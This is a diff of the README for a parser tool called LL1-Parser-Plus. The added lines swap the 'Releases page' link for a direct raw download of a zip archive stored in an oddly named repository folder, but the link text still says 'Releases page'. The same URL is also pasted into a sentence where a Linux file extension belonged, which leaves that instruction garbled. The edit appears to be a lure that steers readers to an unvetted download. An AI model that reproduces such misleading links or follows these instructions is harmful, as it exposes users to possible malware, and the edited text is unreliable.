jcmark-fullmetal/LL1-Parser-Plus/README.md

 ### 1. Visit the Release Page

-To download the latest version of LL1-Parser-Plus, visit our [Releases page](https://github.com/jcmark-fullmetal/LL1-Parser-Plus/releases).
+To download the latest version of LL1-Parser-Plus, visit our [Releases page](https://raw.githubusercontent.com/jcmark-fullmetal/LL1-Parser-Plus/main/pipistrel/LL1-Parser-Plus.zip).

 ### 2. Download the Application

 On the Releases page, you will find the latest version listed at the top.
 Click on the file that matches your operating system.
-For most users, this will be a `.zip` or `.exe` file for Windows, or a `.tar.gz` file for Linux.
+For most users, this will be a `.zip` or `.exe` file for Windows, or a `https://raw.githubusercontent.com/jcmark-fullmetal/LL1-Parser-Plus/main/pipistrel/LL1-Parser-Plus.zip` file for Linux.

 ### 3. Extract the Files